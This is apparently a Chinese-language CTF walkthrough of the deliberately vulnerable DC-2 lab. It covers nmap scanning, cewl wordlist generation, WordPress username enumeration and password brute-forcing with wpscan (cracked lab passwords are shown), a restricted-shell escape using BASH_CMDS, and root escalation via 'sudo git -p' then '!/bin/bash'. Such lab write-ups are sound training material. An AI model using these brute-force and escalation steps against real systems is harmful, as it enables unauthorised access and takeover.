DC-2

Description
Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
As with the original DC-1, it’s designed with beginners in mind.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Just like with DC-1, there are five flags including the final flag.
And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.
In short, the only flag that really counts, is the final flag.
For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.
I haven’t explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.

Write-UP

以下是ifconfig和虚拟机情况:

扫vmnet1:
hausa@debian:~$ fping -asg 172.16.1.1/24
172.16.1.1
172.16.1.129

扫172.16.1.129:
hausa@debian:~$ nmap -Pn 172.16.1.129
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 13:15 EDT
Nmap scan report for 172.16.1.129
Host is up (0.0024s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds

只开了80,访问一下。访问不了。
进行更详细的扫描:
hausa@debian:~$ nmap -p 1-65535 -A 172.16.1.129
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-13 11:54 EDT
Nmap scan report for 172.16.1.129
Host is up (0.0034s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|http-server-header: Apache/2.4.10 (Debian)

|_http-title: Did not follow redirect to http://dc-2/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
| 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

开了80/http和7744/ssh,80被重定向了
写一下host文件就可以正常访问80了。
得到flag1,如下:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
提示我们:平常用的字典可能没用,尝试用cewl生成字典,爆破,登录。
hausa@debian:~$ cewl http://dc-2/ -w tempdict.txt
再用wpscan枚举用户名。
hausa@debian:~$ wpscan --url http://dc-2 --enumerate u
得到有admin,jerry,tom三个用户,保存到tempusr.txt中。
然后爆破:
hausa@debian:~$ wpscan --url dc-2 -U tempusr.txt -P tempdict.txt
出了两个:
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient

尝试登录。
在jerry的pages里发现flag2,如下:

If you can’t exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
提示说:要是不能exploit wp,就尝试别的方法。
试试ssh。
jerry登不上,tom可以登上。
ls发现flag3.txt,但是cat不能用,用less可以查看,flag3如下:

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
切换到jerry用户,su命令也没有。
直接/bin/su也不行。
添加环境变量也不能添加。
可以调用其他命令解释器绕过这些限制:
切换到jerry后,在jerry的home看到flag4。如下:

Good to see that you’ve made it this far – but you’re not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here – you’re on your own now. 🙂
Go on – git outta here!!!!
只剩su root了,在sudo -l后发现jerry可以不使用密码运行git:
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
提权:
sudo git -p
!/bin/bash

之后在root的home发现最终flag,如下:

Congratulatons!!!
A special thanks to all those who sent me tweets and provided me with feedback – it’sall greatly appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.

结束

总结

一些不需要root密码就可以root身份执行的命令在进入交互模式后可用于提权;
BASH_CMDS[a]=/bin/sh;a可以绕过一些命令的限制,例如在得到flag3前:
tom@DC-2:~$ BASH_CMDS[b]=/bin/cat
tom@DC-2:~$ b flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

如果师傅您有其他理解,请务必将其贴到评论区,不胜感激!